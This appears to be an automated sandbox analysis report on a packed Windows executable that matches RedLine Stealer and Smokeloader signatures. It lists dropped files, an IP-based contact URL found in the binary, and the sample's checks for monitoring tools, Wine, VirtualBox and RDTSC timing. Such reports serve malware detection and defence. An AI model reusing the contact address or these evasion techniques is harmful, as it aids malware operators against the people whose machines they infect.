Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.2598451673.0000000000DA9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
PE file contains section with special chars
Source: zSmMqGGeVy.exeStatic PE information: section name:
Source: zSmMqGGeVy.exeStatic PE information: section name: .idata
Source: zSmMqGGeVy.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeProcess Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00402C700_2_00402C70
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_004188AA0_2_004188AA
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_0040A9600_2_0040A960
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_0040F3200_2_0040F320
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_0040D3DD0_2_0040D3DD
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_0041A3F20_2_0041A3F2
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_004143F90_2_004143F9
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00413CE60_2_00413CE6
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_0041A5120_2_0041A512
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_0040D60F0_2_0040D60F
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_1000E1840_2_1000E184
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_100102A00_2_100102A0
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00A630180_2_00A63018
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_009B5C200_2_009B5C20
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00A29F9D0_2_00A29F9D
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00955EDE0_2_00955EDE
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_008370DD0_2_008370DD
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_009850EB0_2_009850EB
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_0098D6EF0_2_0098D6EF
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_0098BE140_2_0098BE14
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_0081D02D0_2_0081D02D
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_0098025F0_2_0098025F
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00912C4C0_2_00912C4C
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_008AA19B0_2_008AA19B
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00981B8D0_2_00981B8D
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_0097E5BC0_2_0097E5BC
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_0097AFAE0_2_0097AFAE
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_009793DA0_2_009793DA
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_009835E60_2_009835E6
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_0082C71D0_2_0082C71D
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00926F290_2_00926F29
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_0081B33D0_2_0081B33D
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00866D5E0_2_00866D5E
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_0085797B0_2_0085797B
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00E9D8760_2_00E9D876
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00E9ABC70_2_00E9ABC7
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00E93B270_2_00E93B27
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00E9F5870_2_00E9F587
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00E9D6440_2_00E9D644
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00EAA6590_2_00EAA659
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00EAA7790_2_00EAA779
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00EA3F4D0_2_00EA3F4D
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\dll[1] F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: String function: 00E99E07 appears 35 times
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: String function: 10003160 appears 34 times
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: String function: 00409BA0 appears 35 times
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7332 -s 480
Source: zSmMqGGeVy.exe, 00000000.00000003.2261056249.0000000005677000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBunifu_UI_v1.5.3.dll4 vs zSmMqGGeVy.exe
Source: zSmMqGGeVy.exe, 00000000.00000003.2260777470.0000000005FBA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameY-Cleaner.exe4 vs zSmMqGGeVy.exe
Source: zSmMqGGeVy.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.2598451673.0000000000DA9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: Y-Cleaner.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: soft[1].0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: zSmMqGGeVy.exeStatic PE information: Section: vrjcgfkr ZLIB complexity 0.9899012430680456
Source: classification engineClassification label: mal100.evad.winEXE@2/15@1/1
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00402950 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,0_2_00402950
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00DAA45E CreateToolhelp32Snapshot,Module32First,0_2_00DAA45E
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00401880 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,0_2_00401880
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\add[1].htmJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7332
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeFile created: C:\Users\user~1\AppData\Local\Temp\VwweWtdD5CJJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCommand line argument: emp0_2_00408020
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCommand line argument: mixtwo0_2_00408020
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: zSmMqGGeVy.exeReversingLabs: Detection: 36%
Source: zSmMqGGeVy.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: zSmMqGGeVy.exeString found in binary or memory: 185.156.73.23/add?substr=mixtwo&s=three&sub=emp
Source: unknownProcess created: C:\Users\user\Desktop\zSmMqGGeVy.exe "C:\Users\user\Desktop\zSmMqGGeVy.exe"
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7332 -s 480
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeSection loaded: msimg32.dllJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
Source: Cleaner.lnk.0.drLNK file: ..\AppData\Local\Temp\VwweWtdD5CJ\Y-Cleaner.exe
Source: zSmMqGGeVy.exeStatic file information: File size 1903104 > 1048576
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
Source: zSmMqGGeVy.exeStatic PE information: Raw size of vrjcgfkr is bigger than: 0x100000 < 0x1a1000

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeUnpacked PE file: 0.2.zSmMqGGeVy.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vrjcgfkr:EW;zykttmzm:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: Y-Cleaner.exe.0.drStatic PE information: 0xA0CED55F [Tue Jun 29 19:19:59 2055 UTC]
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: dll[1].0.drStatic PE information: real checksum: 0x0 should be: 0x400e1
Source: Bunifu_UI_v1.5.3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x400e1
Source: soft[1].0.drStatic PE information: real checksum: 0x0 should be: 0x170243
Source: Y-Cleaner.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x170243
Source: zSmMqGGeVy.exeStatic PE information: real checksum: 0x1db532 should be: 0x1dab91
Source: zSmMqGGeVy.exeStatic PE information: section name:
Source: zSmMqGGeVy.exeStatic PE information: section name: .idata
Source: zSmMqGGeVy.exeStatic PE information: section name:
Source: zSmMqGGeVy.exeStatic PE information: section name: vrjcgfkr
Source: zSmMqGGeVy.exeStatic PE information: section name: zykttmzm
Source: zSmMqGGeVy.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_0041FAB5 push esi; ret 0_2_0041FABE
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00424388 push ss; ret 0_2_00424389
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_1000E891 push ecx; ret 0_2_1000E8A4
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_0099F306 push 74658D9Fh; mov dword ptr [esp], eax0_2_009A347E
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_0099E632 push edi; mov dword ptr [esp], ecx0_2_009A25DB
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_0099E632 push 2C763800h; mov dword ptr [esp], edi0_2_009A2962
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_0099E632 push esi; mov dword ptr [esp], edi0_2_009A29AB
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_0099E632 push 43B4927Ch; mov dword ptr [esp], ebp0_2_009A29B9
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_0099E632 push edi; mov dword ptr [esp], 5EF7E73Dh0_2_009A33D1
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00A298A7 push edi; mov dword ptr [esp], 52D97E9Fh0_2_00A2990D
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_009AC0B3 push 7FABA278h; mov dword ptr [esp], ebx0_2_009AC103
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_009AC0B3 push 699A5425h; mov dword ptr [esp], ecx0_2_009AC10D
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_009AC0B3 push eax; mov dword ptr [esp], edx0_2_009AC123
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_009AC0B3 push ecx; mov dword ptr [esp], edi0_2_009AC178
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_009AC0B3 push eax; mov dword ptr [esp], 69A4290Eh0_2_009AC195
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00A2D8FF push eax; mov dword ptr [esp], edx0_2_00A2D9A1
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00A1C0D6 push ecx; mov dword ptr [esp], 6FBD3DB1h0_2_00A1C0F8
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00A1C0D6 push ecx; mov dword ptr [esp], 7E7F51FEh0_2_00A1C146
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00A1C0D6 push edi; mov dword ptr [esp], ebp0_2_00A1C14E
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00A1C0D6 push 41289243h; mov dword ptr [esp], ecx0_2_00A1C193
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_009F4001 push 4CD0BD61h; mov dword ptr [esp], ecx0_2_009F401A
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00A5200A push 26322D54h; mov dword ptr [esp], edx0_2_00A51FD0
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00A5200A push 25ABADB8h; mov dword ptr [esp], ecx0_2_00A52096
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00A63018 push edx; mov dword ptr [esp], edi0_2_00A63046
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00A63018 push edi; mov dword ptr [esp], eax0_2_00A63055
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00A63018 push ebp; mov dword ptr [esp], 3FDD08B4h0_2_00A6309F
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00A63018 push edx; mov dword ptr [esp], eax0_2_00A6318F
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00A63018 push 7D747A7Dh; mov dword ptr [esp], esp0_2_00A63197
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00A63018 push ebx; mov dword ptr [esp], eax0_2_00A6322F
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00A55861 push edi; mov dword ptr [esp], 68DD5A50h0_2_00A55889
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00A55982 push esi; mov dword ptr [esp], edx0_2_00A559C5
Source: zSmMqGGeVy.exeStatic PE information: section name: vrjcgfkr entropy: 7.947994555821212
Source: Y-Cleaner.exe.0.drStatic PE information: section name: .text entropy: 7.918511524700298
Source: soft[1].0.drStatic PE information: section name: .text entropy: 7.918511524700298
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeFile created: C:\Users\user\AppData\Local\Temp\VwweWtdD5CJ\Y-Cleaner.exeJump to dropped file
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\dll[1]Jump to dropped file
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]Jump to dropped file
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeFile created: C:\Users\user\AppData\Local\Temp\VwweWtdD5CJ\Bunifu_UI_v1.5.3.dllJump to dropped file
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\dll[1]Jump to dropped file
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]Jump to dropped file

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 992381 second address: 992387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 992387 second address: 99239C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9DF4F36020h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 991BA4 second address: 991BC1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9DF58A6BE8h 0x00000008 jmp 00007F9DF58A6BE2h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 994219 second address: 99421E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 99421E second address: 994267 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9DF58A6BDFh 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jne 00007F9DF58A6BE6h 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b push edi 0x0000001c pop edi 0x0000001d jmp 00007F9DF58A6BE1h 0x00000022 popad 0x00000023 rdtsc
